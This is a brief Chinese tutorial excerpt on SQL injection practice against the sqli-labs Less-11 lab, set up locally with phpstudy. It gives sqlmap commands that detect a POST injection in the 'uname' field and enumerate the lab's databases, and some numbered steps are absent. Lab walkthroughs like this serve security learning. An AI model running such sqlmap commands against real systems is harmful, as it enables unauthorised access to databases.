1、以sqli-labs第十一关关进行测试,使用phpstudy和sqli-labs搭建注入平台,可见工具搭建方法,打开第十一关系统正常运行如下。
4、浏览器username输入123,password输入123,点击submit。
6、使用sqlmap进行注入检测python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-11/" --method POST --data "uname=1&passwd=123456"-p uname 检测出含有uname(POST)注入。
8、获取数据库中所有的库python2 sqlmap.py -r post.txt --dbs获取到7个库
